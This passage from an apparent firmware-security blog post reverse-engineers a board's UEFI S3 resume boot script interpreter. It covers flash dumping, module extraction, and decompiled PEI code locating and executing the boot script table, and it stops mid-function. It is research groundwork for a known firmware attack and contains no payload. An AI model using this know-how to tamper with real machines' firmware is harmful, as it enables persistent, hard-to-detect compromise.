#define EFI_BOOT_SCRIPT_MEM_READ_WRITE_OPCODE           0x03 
#define EFI_BOOT_SCRIPT_PCI_CONFIG_WRITE_OPCODE         0x04 
#define EFI_BOOT_SCRIPT_PCI_CONFIG_READ_WRITE_OPCODE    0x05 
#define EFI_BOOT_SCRIPT_SMBUS_EXECUTE_OPCODE            0x06 
#define EFI_BOOT_SCRIPT_STALL_OPCODE                    0x07 
#define EFI_BOOT_SCRIPT_DISPATCH_OPCODE                 0x08

A real implementation of S3 resume also may have some custom opcodes in addition. Obviously, they are not described in any specs.

Acquiring and unpacking firmware image


First of all, for reverse engineering of boot script table interpreter, we need to obtain a firmware image for target platform. It’s possible to download firmware updates from vendor web-site and unpack them, but if you don’t wan’t to mess with firmware updates format (which may be proprietary/undocumented) it’s better to dump actual flash image contents from SPI flash chip that located on the motherboard. In most of the cases, for dumping flash you just might to use a flashrom utility directly from environment of operating system that running on the target platform (software way). If your chipset/motherboard is not supported by flashrom like my DQ77KB, you can use other computer to read flash chip contents with SPI programmer device (it should work even without chip de-soldering).

Intel DQ77KB has two different SPI flash chips:


First I thought that it might be something similar to dual BIOS technology, but actually these chips has different capacity (64 and 32 Mbit) and both of them are used to store single flash image which is too big to fit into the single 64 Mbit chip. For decent work with such board without needing to reconnect programmer each time to read/write both of the chips, I decided to use a two-channel FT2232H mini module from FTDI which has USB interface and supports a lot of widely used hardware protocols like SPI, UART, I2C and JTAG. A and B channels of the board are connected to the 1-st and 2-nd chip correspondingly:

Chip pin Board pin, ch. A Board pin, ch. B

1CN2.12CN3.23
2CN2.09CN3.24
3CN2.14CN3.21
4CN2.02CN3.04
5CN2.10CN3.25
6CN2.07CN3.26
7CN2.13CN3.20
8CN2.05CN3.01

If you need to read flash chip only one or several times — it might be okay to use microprobes or SOIC-8 test clip for connection with the chip.

Because I’m doing different kind of work that requires firmware modification and board unbrick pretty often, I decided to solder a thin МГТФ wires with 8-pin PLS connectors directly to my chips. This setup is much more convenient, solid and you can keep it at your desk inside closed case in regular way without needing to waste a time to connect probes or clips:

1-st chip of DQ77KB connected to FT2232H mini module.
Lighting LEDs — side effect of parasitic power from programmer.

Flashrom allows to use an FTDI FT2232/FT4232H/FT232H based device as external SPI programmer, let's read contents of two chips and join them together:
# flashrom -p ft2232_spi:type=2232H,port=A --read fw.bin

flashrom v0.9.7-r1854 on Linux 3.8.0-44-generic (x86_64)
flashrom is free software, get the source code at http://www.flashrom.org

Calibrating delay loop... OK.
Found Winbond flash chip "W25Q64.V" (8192 kB, SPI) on ft2232_spi.
Reading flash... done.

# flashrom -p ft2232_spi:type=2232H,port=B --read fw_2.bin

flashrom v0.9.7-r1854 on Linux 3.8.0-44-generic (x86_64)
flashrom is free software, get the source code at http://www.flashrom.org

Calibrating delay loop... OK.
Found Winbond flash chip "W25Q32.V" (4096 kB, SPI) on ft2232_spi.
Reading flash... done.

# cat fw_2.bin >> fw.bin && rm fw_2.bin

Readed firmware flash descriptor consists from different regios (BIOS, ME, etc.) that may contain Firmware File System (FFS) volumes. UEFI code is decomposed across different modules (which uses a PE/COFF executable format subset) of different types (PEI stage, DXE stage, SMM code, etc.) that stored on FFS as files. On modern motherboards UEFI may contain more than several hundreds of PE modules (~250 on my DQ77KB).

To extract these modules we will use a uefi-firmware-parser utility. It's not a prefect tool, but in my case uefi-firmware-parser doing it’s job well after several bug fixes (program author already included them into source). Also, this tool is written in Python that makes it relatively flexible and modification friendly.
$ cd uefi-firmware-parser
$ python scripts/fv_parser.py --extract --output ./fw_extracted --flash fw.bin

Parsing Flash descriptor.
Flash Descriptor (Intel PCH) chips 1, regions 3, masters 2, PCH straps 18, PROC straps 1, ICC entries 0
  Flash Region type= bios, size= 0x640000 (6553600 bytes) details[ read: 11, write: 10, base: 1472, limit: 3071, id: 0 ]
    Firmware Volume: 8c8ce578-8a3d-4f1c-3599-896185c32dd3 attr 0x0003feff, rev 2, cksum 0xe6ae, size 0x20000 (131072 bytes)
      Firmware Volume Blocks:  (32, 0x1000)
      File 0: cef5b9a3-476d-497f-dc9f-e98143e0422c type 0x01, attr 0x00, state 0x0f, size 0x1ffb8 (131000 bytes), (raw)
        RawObject: size= 130976
    Firmware Volume: 8c8ce578-8a3d-4f1c-3599-896185c32dd3 attr 0x0003feff, rev 2, cksum 0xe6ae, size 0x20000 (131072 bytes)
      Firmware Volume Blocks:  (32, 0x1000)
      File 0: cef5b9a3-476d-497f-dc9f-e98143e0422c type 0x01, attr 0x00, state 0x07, size 0x1ffb8 (131000 bytes), (raw)
        RawObject: size= 130976
    Firmware Volume: 8c8ce578-8a3d-4f1c-3599-896185c32dd3 attr 0x0003feff, rev 2, cksum 0xe648, size 0x80000 (524288 bytes)
      Firmware Volume Blocks:  (128, 0x1000)
      File 0: a6beb857-b370-40fb-eb8e-df17aacd955f type 0x02, attr 0x00, state 0x07, size 0x926a (37482 bytes), (freeform)
        Section 0: type 0x01, size 0x9252 (37458 bytes) (Compression section)
          Section 0: type 0x19, size 0x9864 (39012 bytes) (Raw section)
      File 1: 918e7ad1-c1fa-474e-ed82-356dd84f3795 type 0x02, attr 0x00, state 0x07, size 0x7182 (29058 bytes), (freeform)
        Section 0: type 0x01, size 0x716a (29034 bytes) (Compression section)
          Section 0: type 0x19, size 0x76b8 (30392 bytes) (Raw section)
      File 2: ed10cbd0-ec4d-412e-e080-e541edc805f7 type 0x02, attr 0x00, state 0x07, size 0x506a (20586 bytes), (freeform)
        Section 0: type 0x01, size 0x5052 (20562 bytes) (Compression section)
          Section 0: type 0x19, size 0x53ed (21485 bytes) (Raw section)
    Firmware Volume: 8c8ce578-8a3d-4f1c-3599-896185c32dd3 attr 0x0003feff, rev 2, cksum 0xe648, size 0x80000 (524288 bytes)
      Firmware Volume Blocks:  (128, 0x1000)
      File 0: 17088572-377f-44ef-4e8f-b09fff46a070 (CPU_MICROCODE_FILE_GUID) type 0x01, attr 0x48, state 0x07, size 0xa018 (40984 bytes), (raw)
        RawObject: size= 40960
      File 1: 3b42ef57-16d3-44cb-3286-9fdb06b41451 (DELL_MEMORY_INIT_GUID) type 0x06, attr 0x40, state 0x07, size 0x272fc (160508 bytes), (pei module)
        Section 0: type 0x1b, size 0x100 (256 bytes) (PEI dependency expression section)
        Section 1: type 0x10, size 0x271e4 (160228 bytes) (PE32 image section)
      File 2: 7fd38521-7798-41e5-5e81-12e01fe23c11 type 0x06, attr 0x40, state 0x07, size 0x3cf9 (15609 bytes), (pei module)
        Section 0: type 0x1b, size 0x3a (58 bytes) (PEI dependency expression section)
        Section 1: type 0x01, size 0x3ca5 (15525 bytes) (Compression section)
          Section 0: type 0x10, size 0x8924 (35108 bytes) (PE32 image section)
      File 3: 70c2051d-5956-4466-39b1-9e1346f9de0c type 0x06, attr 0x40, state 0x07, size 0x3790 (14224 bytes), (pei module)
        Section 0: type 0x1b, size 0x3a (58 bytes) (PEI dependency expression section)
        Section 1: type 0x01, size 0x373c (14140 bytes) (Compression section)
          Section 0: type 0x10, size 0x5964 (22884 bytes) (PE32 image section)
      File 4: dc292e2e-d532-4eb7-2f83-3068d7f5951e type 0x06, attr 0x40, state 0x07, size 0x7dc (2012 bytes), (pei module)
        Section 0: type 0x1b, size 0x5e (94 bytes) (PEI dependency expression section)
        Section 1: type 0x10, size 0x764 (1892 bytes) (PE32 image section)
      File 5: 078f54d4-cc22-4048-949e-879c214d562f type 0xf0, attr 0x00, state 0x07, size 0x47010 (290832 bytes), (ffs padding)
      File 6: 1ba0062e-c779-4582-6685-336ae8f78f09 (EFI_FFS_VOLUME_TOP_FILE_GUID) type 0x02, attr 0x40, state 0x07, size 0x20 (32 bytes), (freeform)
        Section 0: type 0x19, size 0x8 (8 bytes) (Raw section)
    Firmware Volume: 8c8ce578-8a3d-4f1c-3599-896185c32dd3 attr 0x0003feff, rev 2, cksum 0xe1c4, size 0x4c0000 (4980736 bytes)
      Firmware Volume Blocks:  (1216, 0x1000)
      File 0: 5c266089-e103-4d43-b59a-12d7095be2af type 0x07, attr 0x40, state 0x07, size 0xa2a (2602 bytes), (driver)
        Section 0: type 0x13, size 0x28 (40 bytes) (DXE dependency expression section)
        Section 1: type 0x01, size 0x9ea (2538 bytes) (Compression section)
          Section 0: type 0x10, size 0x12c4 (4804 bytes) (PE32 image section)
      File 1: 5bba83e6-f027-4ca7-d0bf-16358cc9e123 type 0x07, attr 0x40, state 0x07, size 0xac3c (44092 bytes), (driver)
        Section 0: type 0x10, size 0xac24 (44068 bytes) (PE32 image section)
      File 2: 8d59ebc8-b85e-400e-0a97-1f995d1db91e type 0x07, attr 0x40, state 0x07, size 0xa9dc (43484 bytes), (driver)
        Section 0: type 0x10, size 0xa9c4 (43460 bytes) (PE32 image section)
      File 3: eb969dee-3ca7-482e-7589-ef8d9f160dd1 type 0x07, attr 0x40, state 0x07, size 0x8ba (2234 bytes), (driver)
        Section 0: type 0x13, size 0x16 (22 bytes) (DXE dependency expression section)
        Section 1: type 0x01, size 0x88a (2186 bytes) (Compression section)
          Section 0: type 0x10, size 0x10c4 (4292 bytes) (PE32 image section)
      File 4: f918e883-7c0f-444c-0ba7-a73350112689 type 0x07, attr 0x40, state 0x07, size 0xbdb (3035 bytes), (driver)
        Section 0: type 0x13, size 0x16 (22 bytes) (DXE dependency expression section)
        Section 1: type 0x01, size 0xbab (2987 bytes) (Compression section)
          Section 0: type 0x10, size 0x1704 (5892 bytes) (PE32 image section)
      File 5: e03abadf-e536-4e88-a0b3-b77f78eb34fe (DELL_CPU_DXE_GUID) type 0x07, attr 0x40, state 0x07, size 0x1883 (6275 bytes), (driver)
        Section 0: type 0x13, size 0x6 (6 bytes) (DXE dependency expression section)
        Section 1: type 0x01, size 0x1863 (6243 bytes) (Compression section)
          Section 0: type 0x10, size 0x2d24 (11556 bytes) (PE32 image section)
      File 6: 93022f8c-1f09-47ef-b2bb-5814ff609df5 (DELL_FILE_SYSTEM_GUID) type 0x07, attr 0x40, state 0x07, size 0x46c1 (18113 bytes), (driver)
        Section 0: type 0x01, size 0x46a9 (18089 bytes) (Compression section)
          Section 0: type 0x10, size 0x7e04 (32260 bytes) (PE32 image section)
      File 7: dac2b117-b5fb-4964-12a3-0dcc77061b9b (FONT_FFS_FILE_GUID) type 0x02, attr 0x40, state 0x07, size 0x5a5 (1445 bytes), (freeform)
        Section 0: type 0x01, size 0x58d (1421 bytes) (Compression section)
          Section 0: type 0x18, size 0xfc4 (4036 bytes) (Free-form GUID section)
      File 8: 9221315b-30bb-46b5-3e81-1b1bf4712bd3 (SETUP_DEFAULTS_FFS_GUID) type 0x02, attr 0x40, state 0x07, size 0x178 (376 bytes), (freeform)
        Section 0: type 0x01, size 0x160 (352 bytes) (Compression section)
          Section 0: type 0x19, size 0x2c4 (708 bytes) (Raw section)
      File 9: 5ae3f37e-4eae-41ae-4082-35465b5e81eb (DELL_CORE_DXE_GUID) type 0x05, attr 0x40, state 0x07, size 0x27b15 (162581 bytes), (dxe core)
        Section 0: type 0x01, size 0x27afd (162557 bytes) (Compression section)
          Section 0: type 0x10, size 0x152a44 (1387076 bytes) (PE32 image section)
          Section 1: type 0x18, size 0xc53 (3155 bytes) (Free-form GUID section)

... around 300 of other FFS files that was skipped

For uefi-firmware-parser alternative you also may have a look at UEFITool, Qt-based utility that runs on Windows, OS X and Linux.

Original description of the attack mentions EFI_PEI_S3_RESUME_PPI, EFI interface that implements ACPI boot script handling. GUID value for this interface is 4426CCB2-E684-4a8a-ae40-20d4b025b710, let’s search it's raw binary data inside UEFI modules that was extracted from firmware:
$ for s in `find ./fw_extracted -type d`; \
do grep -obUaP '\xb2\xcc\x26\x44\x84\xe6\x8a\x4a' $s/*; \
done | grep '\.pe' | awk -F: '{print $1, $2}'

./fw_extracted/regions/region-bios/volume-volume/file-92685943-d810-47ff-12a1-cc8490776a1f/section0.pe 49160
./fw_extracted/regions/region-bios/volume-volume/file-efd652cc-0e99-40f0-c096-e08c089070fc/section1.pe 5408

This GUID presents inside of only two files: file-efd652cc-0e99-40f0-c096-e08c089070fc/section1.pe and file-92685943-d810-47ff-12a1-cc8490776a1f/section0.pe. According to the uefi-firmware-parser output, both of them are UEFI PEI (Pre-EFI Initialisation) executable images, so, we have to look inside with IDA.

PEI introduction


Before we start, let’s learn a several key conceptions that required for disassembling and understanding of the UEFI PEI stage code.

PEI Foundation API is described by structure EFI_PEI_SERVICES, usually runtime is passing address of this structure to the entry point function of each PEI module (PEIM) that was loaded from FFS. Here is the definition of this structure with functions description:
typedef struct _EFI_PEI_SERVICES 
{
  EFI_TABLE_HEADER               Hdr;                // Table header.
  EFI_PEI_INSTALL_PPI            InstallPpi;         // Installs an interface.
  EFI_PEI_REINSTALL_PPI          ReInstallPpi;       // Reinstalls an interface.
  EFI_PEI_LOCATE_PPI             LocatePpi;          // Locates installed interface by GUID.
  EFI_PEI_NOTIFY_PPI             NotifyPpi;          // Installs notification service for interface
                                                     // installation and reinstallation.

  EFI_PEI_GET_BOOT_MODE          GetBootMode;        // Returns the present value of the boot mode.
  EFI_PEI_SET_BOOT_MODE          SetBootMode;        // Sets the value of the boot mode.
  EFI_PEI_GET_HOB_LIST           GetHobList;         // Get Hand-Off Blocks (HOBs) list pointer.
  EFI_PEI_CREATE_HOB             CreateHob;          // Abstracts the creation of HOB headers.
  EFI_PEI_FFS_FIND_NEXT_VOLUME   FfsFindNextVolume;  // Discovers instances of firmware volumes.
  EFI_PEI_FFS_FIND_NEXT_FILE     FfsFindNextFile;    // Discovers instances of firmware files.
  EFI_PEI_FFS_FIND_SECTION_DATA  FfsFindSectionData; // Discovers files of the firmware File System
                                                     // (FFS) volume.

  EFI_PEI_INSTALL_PEI_MEMORY     InstallPeiMemory;   // Registers the found memory configuration.
  EFI_PEI_ALLOCATE_PAGES         AllocatePages;      // Allocates memory ranges.
  EFI_PEI_ALLOCATE_POOL          AllocatePool;       // Allocates memory from the HOB heap.
  EFI_PEI_COPY_MEM               CopyMem;            // Copies the contents of one buffer to another.
  EFI_PEI_SET_MEM                SetMem;             // Fills a buffer with a specified value.
  EFI_PEI_REPORT_STATUS_CODE     ReportStatusCode;   // Provides an interface that a PEIM can call
                                                     // to report a status code.
                                                    
  EFI_PEI_RESET_SYSTEM           ResetSystem;        // Resets the entire platform.
  EFI_PEI_CPU_IO_PPI             CpuIo;              // Provides an interface for I/O transactions.
  EFI_PEI_PCI_CFG_PPI            PciCfg;             // Provides an interface for PCI configuration
                                                     // transactions.
} EFI_PEI_SERVICES;

PEIMs can use InstallPpi() function to install a PEI PEIM-to-PEIM Interface (PPI) database by GUID:
typedef EFI_PEI_PPI_DESCRIPTOR 
{
  UINTN    Flags; // Interface flags.
  EFI_GUID *Guid; // Interface GUID.
  VOID     *Ppi;  // Pointer to the interface-specific structure.
 
} EFI_PEI_PPI_DESCRIPTOR;

typedef
EFI_STATUS
(EFIAPI * EFI_PEI_INSTALL_PPI)(
  IN struct _EFI_PEI_SERVICES **PeiServices,
  IN EFI_PEI_PPI_DESCRIPTOR   *PpiList // List of the interfaces to install.
);

PEIMs also can use LocatePpi() function for finding existing interface (it can be implemented by the same PEIM or other PEIM as well) by it’s GUID:
typedef
EFI_STATUS
(EFIAPI * EFI_PEI_LOCATE_PPI)(
  IN     struct _EFI_PEI_SERVICES **PeiServices,
  IN     EFI_GUID                 *Guid,
  IN     UINTN                    Instance,
  IN OUT EFI_PEI_PPI_DESCRIPTOR   **PpiDescriptor,
  IN OUT VOID                     **Ppi
);

Reverse engineering of S3 resume code


Let’s load FFS file file-efd652cc-0e99-40f0-c096-e08c089070fc/section1.pe into the IDA and check some code around it’s module entry point:
.text:FFBB54EE                 public EntryPoint
.text:FFBB54EE EntryPoint      proc near
.text:FFBB54EE
.text:FFBB54EE arg_0           = dword ptr  4
.text:FFBB54EE arg_4           = dword ptr  8
.text:FFBB54EE
.text:FFBB54EE                 push    esi
.text:FFBB54EF                 mov     esi, [esp+4+arg_4]
.text:FFBB54F3                 push    esi
.text:FFBB54F4                 push    [esp+8+arg_0]
.text:FFBB54F8                 call    sub_FFBB5D9C
.text:FFBB54FD                 mov     eax, [esi]
.text:FFBB54FF                 push    offset unk_FFBB64C8
.text:FFBB5504                 push    esi
.text:FFBB5505                 call    dword ptr [eax+18h]
.text:FFBB5508                 add     esp, 10h
.text:FFBB550B                 pop     esi
.text:FFBB550C                 retn
.text:FFBB550C EntryPoint      endp

.text:FFBB5D9C sub_FFBB5D9C    proc near
.text:FFBB5D9C
.text:FFBB5D9C arg_4           = dword ptr  8
.text:FFBB5D9C
.text:FFBB5D9C                 mov     eax, [esp+arg_4]
.text:FFBB5DA0                 mov     ecx, [eax]
.text:FFBB5DA2                 push    offset unk_FFBB6558
.text:FFBB5DA7                 push    eax
.text:FFBB5DA8                 call    dword ptr [ecx+18h]
.text:FFBB5DAB                 pop     ecx
.text:FFBB5DAC                 pop     ecx
.text:FFBB5DAD                 retn
.text:FFBB5DAD sub_FFBB5D9C    endp

There's not so much of useful tools and IDA scripts for reverse engineering of UEFI binaries, a project that should be mentioned: EFI scripts for IDA Pro, by @snare. Unfortunately, rename_tables() and rename_structs() features (actually, the most desired) are not works for PEI modules, because EFI scripts for IDA Pro was designed rather for DXE stage. You can try to implement a PEI support with adding a proper handling of EFI_PEI_SERVICES table into the efiutils.py. Nevertheless, GUIDs finding and renaming feature works well for all kind of binaries, also you can grab UEFI data structures definitions as single file which is convenient for loading it into the IDA.

After manual propagating of types information and renaming GUIDs, assembly code from module entry point looks pretty friendly:
.text:FFBB54EE ; EFI_STATUS __stdcall EntryPoint(PVOID FileHandle, EFI_PEI_SERVICES **ppPeiServices)
.text:FFBB54EE                 public EntryPoint
.text:FFBB54EE EntryPoint      proc near
.text:FFBB54EE
.text:FFBB54EE FileHandle      = dword ptr  4
.text:FFBB54EE ppPeiServices   = dword ptr  8
.text:FFBB54EE
.text:FFBB54EE                 push    esi
.text:FFBB54EF                 mov     esi, [esp+4+ppPeiServices]
.text:FFBB54F3                 push    esi
.text:FFBB54F4                 push    [esp+8+FileHandle]
.text:FFBB54F8                 call    RegisterBootScriptExecuter
.text:FFBB54FD                 mov     eax, [esi]
.text:FFBB54FF                 push    offset gEfiPeiS3ResumePpiDescriptor ; EFI_PEI_PPI_DESCRIPTOR *
.text:FFBB5504                 push    esi ; PEFI_PEI_SERVICES *
.text:FFBB5505                 call    [eax+EFI_PEI_SERVICES.InstallPpi]
.text:FFBB5508                 add     esp, 10h
.text:FFBB550B                 pop     esi
.text:FFBB550C                 retn
.text:FFBB550C EntryPoint      endp

.text:FFBB5D9C ; EFI_STATUS __cdecl RegisterBootScriptExecuter(PVOID FileHandle, EFI_PEI_SERVICES **ppPeiServices)
.text:FFBB5D9C RegisterBootScriptExecuter proc near
.text:FFBB5D9C
.text:FFBB5D9C ppPeiServices   = dword ptr  8
.text:FFBB5D9C
.text:FFBB5D9C                 mov     eax, [esp+ppPeiServices]
.text:FFBB5DA0                 mov     ecx, [eax]
.text:FFBB5DA2                 push    offset gEfiPeiBootScriptExecuterPpiDescriptor ; EFI_PEI_PPI_DESCRIPTOR *
.text:FFBB5DA7                 push    eax ; PEFI_PEI_SERVICES *
.text:FFBB5DA8                 call    [ecx+EFI_PEI_SERVICES.InstallPpi]
.text:FFBB5DAB                 pop     ecx
.text:FFBB5DAC                 pop     ecx
.text:FFBB5DAD                 retn
.text:FFBB5DAD RegisterBootScriptExecuter endp

.data:FFBB645C gEfiPeiS3ResumePpiGuid dd 4426CCB2h     ; Data1
.data:FFBB645C                 dw 0E684h               ; Data2
.data:FFBB645C                 dw 4A8Ah                ; Data3
.data:FFBB645C                 db 0AEh, 40h, 20h, 0D4h, 0B0h, 25h, 0B7h, 10h; Data4

.data:FFBB64A8 gEfiPeiS3ResumePpi EFI_PEI_S3_RESUME_PPI <0FFBB51BCh>

.data:FFBB64C8 gEfiPeiS3ResumePpiDescriptor EFI_PEI_PPI_DESCRIPTOR <80000010h, \
.data:FFBB64C8                                         offset gEfiPeiS3ResumePpiGuid, \
.data:FFBB64C8                                         offset gEfiPeiS3ResumePpi>

.data:FFBB6524 gEfiPeiBootScriptExecuterPpiGuid dd 0ABD42895h    ; Data1
.data:FFBB6524                 dw 78CFh                          ; Data2
.data:FFBB6524                 dw 4872h                          ; Data3
.data:FFBB6514                 db 9Dh, 0FCh, 6Ch, 0BFh, 5Eh, 0E2h, 2Ch, 2Eh; Data4

.data:FFBB6554 gEfiPeiBootScriptExecuterPpi EFI_PEI_BOOT_SCRIPT_EXECUTER_PPI <0FFBB5608h>

.data:FFBB6558 gEfiPeiBootScriptExecuterPpiDescriptor EFI_PEI_PPI_DESCRIPTOR <80000010h, \
.data:FFBB6558                                         offset gEfiPeiBootScriptExecuterPpiGuid, \
.data:FFBB6558                                         offset gEfiPeiBootScriptExecuterPpi>

And C-like pseudocode for these functions:
EFI_STATUS __stdcall EntryPoint(PVOID FileHandle, EFI_PEI_SERVICES **ppPeiServices)
{
  RegisterBootScriptExecuter(FileHandle, ppPeiServices);

  // install S3 resume PPI
  return (*ppPeiServices)->InstallPpi(ppPeiServices, &gEfiPeiS3ResumePpiDescriptor);
}

EFI_STATUS __cdecl RegisterBootScriptExecuter(PVOID FileHandle, EFI_PEI_SERVICES **ppPeiServices)
{
  // install boot script executer PPI
  return (*ppPeiServices)->InstallPpi(ppPeiServices, &gEfiPeiBootScriptExecuterPpiDescriptor);
}

It's clear that after loading this module registers two interfaces (more details about them are available in specs):

  • EFI_PEI_S3_RESUME_PPI — PPI that accomplishes the firmware S3 resume boot path and transfers control to OS.
  • EFI_PEI_BOOT_SCRIPT_EXECUTER_PPI — PPI that produces functions to interpret and execute the Framework boot script table.

Also it’s easy to figure that second module, file-92685943-d810-47ff-12a1-cc8490776a1f/section0.pe (which is actually a PEI core module in according to it’s GUID), has procedure sub_FFFCA505 that references EFI_PEI_S3_RESUME2_PPI_GUID. This procedure calls EFI_PEI_S3_RESUME2_PPI.S3RestoreConfig2() (if available) or EFI_PEI_S3_RESUME_PPI.S3RestoreConfig(). It seems that only  EFI_PEI_S3_RESUME_PPI interface is used on my test system.
EFI_STATUS __cdecl sub_FFFCA505(EFI_PEI_SERVICES **ppPeiServices)
{
  EFI_STATUS Result;
  EFI_STATUS Status;
  EFI_PEI_S3_RESUME2_PPI *pS3Resume2;
  EFI_PEI_S3_RESUME_PPI *pS3Resume;  

  // try to locate S3Resume2 PPI first
  if ((*ppPeiServices)->LocatePpi(
    ppPeiServices, &gEfiPeiS3Resume2PpiGuid, 0, &ppPeiServices, &pS3Resume2) & 0x80000000)
  {
    // try to use S3Resume PPI if fails
    Status = (*ppPeiServices)->LocatePpi(
      ppPeiServices_, &gEfiPeiS3ResumePpiGuid, 0, &ppPeiServices, &pS3Resume
    );
    if (Status & 0x80000000)
    {
      (*ppPeiServices)->ReportStatusCode(ppPeiServices, 0x80000002u, 0x3038005u, 0, 0, 0);
      
      // unable to locate required PPI
      Result = Status;
    }
    else
    {
      // restore platform state
      Result = pS3Resume->S3RestoreConfig(ppPeiServices);
    }
  }
  else
  {
    // restore platform state
    Result = pS3Resume2->S3RestoreConfig2(pS3Resume2);
  }

  return Result;
}

Now let’s get back to the first PEI module. Intel S3 Resume Boot Path Specification has a useful description of actions that must be done by implementation of the EFI_PEI_S3_RESUME_PPI.S3RestoreConfig():


This function will restore the platform to its preboot configuration that was prestored in EFI_ACPI_S3_RESUME_SCRIPT_TABLE and transfer control to OS waking vector. Upon invocation, this function is responsible for locating the following information before jumping to OS waking vector:

  • ACPI table
  • S3 resume boot script table
  • Any other information that it needs

All this necessary information should have been previously prepared by the EFI_ACPI_S3_SAVE_PROTOCOL.S3Save() function on a normal boot path. The S3RestoreConfig() function then executes the prestored boot script table by calling
EFI_PEI_BOOT_SCRIPT_EXECUTER_PPI.Execute() and transitions the platform to the preboot state. Finally, this function transfers control to the OS waking vector. If the OS supports only a real-mode waking vector, this function will switch from flat mode to real mode before jumping to the waking vector.


Here is S3RestoreConfig() decompiled code, to make it simpler I skipped a lot of stuff that doesn’t belongs to the boot script table handling that we are interested in:
EFI_STATUS __cdecl S3RestoreConfig(EFI_PEI_SERVICES **ppPeiServices)
{
  EFI_STATUS Result;
  EFI_STATUS Status;  
  EFI_PEI_BOOT_SCRIPT_EXECUTER_PPI *pBootScriptExecuter;
  int AcpiGlobalVariable;
  __int64 pBootScript;

  EFI_PEI_SERVICES *pPeiServices = *ppPeiServices;
  pPeiServices->ReportStatusCode(ppPeiServices, 1, 0x3038000u, 0, 0, 0);

  // get boot script executer PPI
  Status = (*ppPeiServices)->LocatePpi(
    ppPeiServices, &gEfiPeiBootScriptExecuterPpiGuid, 0, 0, &pBootScriptExecuter
  );
  if (Status & 0x80000000)
  {
    (*ppPeiServices)->ReportStatusCode(ppPeiServices, 0x80000002u, 0x3038006u, 0, 0, 0);

    Result = Status;
  }
  else
  {
    // get ACPI global variable address
    AcpiGlobalVariable = sub_FFBB550D(ppPeiServices);
    AcpiGlobalVariable_ = AcpiGlobalVariable;
    if (AcpiGlobalVariable)
    {
      // get boot script table address
      v5 = *(unsigned int *)(AcpiGlobalVariable + 0x18);
      HIDWORD(pBootScript) = *(unsigned int *)(AcpiGlobalVariable + 0x1C);
      LODWORD(pBootScript) = v5;

      pPeiServices->ReportStatusCode(ppPeiServices_, 1, 0x3038001u, 0, 0, 0);

      // execute boot script table
      if (pBootScriptExecuter->Execute(
        ppPeiServices, pBootScriptExecuter, pBootScript, HIDWORD(pBootScript), 0) & 0x80000000)
      {
        (*ppPeiServices)->ReportStatusCode(ppPeiServices, 0x80000002u, 0x3038006u, 0, 0, 0);
      }
      
      // ... skipped the rest part of S3 resume code ...

      Result = 0x80000003u;
    }
    else
    {
      (*ppPeiServices)->ReportStatusCode(ppPeiServices, 0x80000002u, 0x3038008u, 0, 0, 0);

      Result = 0x8000000Eu;
    }
  }

  return Result;
}

As we can see, this function gets boot script table address at offset 0x18 from the beginning of the ACPI global variable structure, and then calls another PPI (which is located inside the same PEIM and was registered early during the EntryPoint execution) to execute boot script code. Function sub_FFBB550D(), that locates address of the ACPI global variable, reads it from the 4-bytes firmware variable with GUID af9ffd67-ec10-488a-9dfc-6cbf5ee22c2e:
int __cdecl sub_FFBB550D(EFI_PEI_SERVICES **ppPeiServices)
{
  EFI_PEI_SERVICES *pPeiServices = *ppPeiServices;
  EFI_PEI_READ_ONLY_VARIABLE2_PPI *pReadOnlyVariable2;
  EFI_STATUS Status;
  int v4 = 4; 
  int v5 = 0; 

  // locate EFI variable PPI
  pPeiServices->LocatePpi(
    ppPeiServices, &gEfiPeiReadOnlyVariable2PpiGuid, 0, 0, &pReadOnlyVariable2
  );

  // query variable value
  Status = pReadOnlyVariable2->GetVariable(
    pReadOnlyVariable2, L"AcpiGlobalVariable", &gAcpiGlobalVariableGuid, 0, &v4, &v5
  );

  return (Status & 0x80000000) == 0 ? v5 : 0;
}

Now, when location of the current boot script table address is known, it’s possible to dump it using CHIPSEC framework (this tool will be described a bit later).

First 0xD0 bytes of the boot script has the following contents:


Some obviously recognisable fields of the table entries are highlighted: red — entry index, green — entry size in bytes, blue — opcode. At this point we can notice, that given boot script format is pretty different in comparison with reference implementation of the boot script table from EDK2 source code (see EfiBootScript.h and PiDxeS3BootScriptLib).

Here is decompiled code of the EFI_PEI_BOOT_SCRIPT_EXECUTER_PPI.Execute() function that implements boot script table parsing and execution:
EFI_STATUS __cdecl Execute(EFI_PEI_SERVICES **ppPeiServices, 
                           EFI_PEI_BOOT_SCRIPT_EXECUTER_PPI *This, 
                           __int64 Address, int FvFile)
{
  unsigned int InstructionPtr;
  EFI_STATUS Result;
  EFI_STATUS Opcode;
  EFI_PEI_SERVICES *pPeiServices;

  // stack arguments that will be set by ParseInstruction() calls
  unsigned int v32; // [bp-64h]@10
  int v33; // [bp-5Eh]@70
  __int64 v34; // [bp-5Ch]@11
  __int64 v35; // [bp-54h]@15
  __int64 v36; // [bp-4Ch]@17
  int v37; // [bp-44h]@23
  int v38; // [bp-40h]@23

  EFI_PEI_SMBUS2_PPI *pSmbus2; 
  EFI_PEI_STALL_PPI *pStall;
  EFI_PEI_CPU_IO_PPI *pCpuIo;
  EFI_PEI_PCI_CFG_PPI *pPciCfg;

  EFI_PEI_PCI_CFG_PPI *pPciCfg_;
  EFI_PEI_PCI_CFG_PPI *pPciCfg__;

  InstructionPtr = Address;
  v49 = 0;

  if (FvFile)
    return 0x80000003u;

  if (!Address)
    return 0x80000002u;

  pCpuIo = (EFI_PEI_CPU_IO_PPI *)(*ppPeiServices)->CpuIo;
  pPciCfg = (EFI_PEI_PCI_CFG_PPI *)(*ppPeiServices)->PciCfg;

  if ((*ppPeiServices)->LocatePpi(ppPeiServices, &gEfiPeiSmbus2PpiGuid, 0, 0, &pSmbus2) & 0x80000000 || 
      (*ppPeiServices)->LocatePpi(ppPeiServices, &gEfiPeiStallPpiGuid, 0, 0, &pStall) & 0x80000000)
    goto LABEL_97;

  while (1)
  {
LABEL_7:
    
    InstructionPtr += 8;
    Opcode = *(unsigned char *)InstructionPtr;
    
    if (Opcode <= 128)
    {
      if (Opcode != 128)
      {
        switch (Opcode)
        {
          case 0:

            // EFI_BOOT_SCRIPT_IO_WRITE_OPCODE
            ParseInstruction(&v32, (const void *)InstructionPtr, 0x10u);
            v7 = InstructionPtr + 16;
            v8 = v7;
            if ((unsigned __int8)(BYTE1(v32) & 0xFC) == 4)
              v9 = 1;
            else
              v9 = v34;
            InstructionPtr = v9 * (unsigned __int8)(1 << (BYTE1(v32) & 3)) + v7;
            pCpuIo->IoRead16(ppPeiServices, pCpuIo, BYTE1(v32), HIWORD(v32), 0, v34, v8);
            continue;

          case 1:

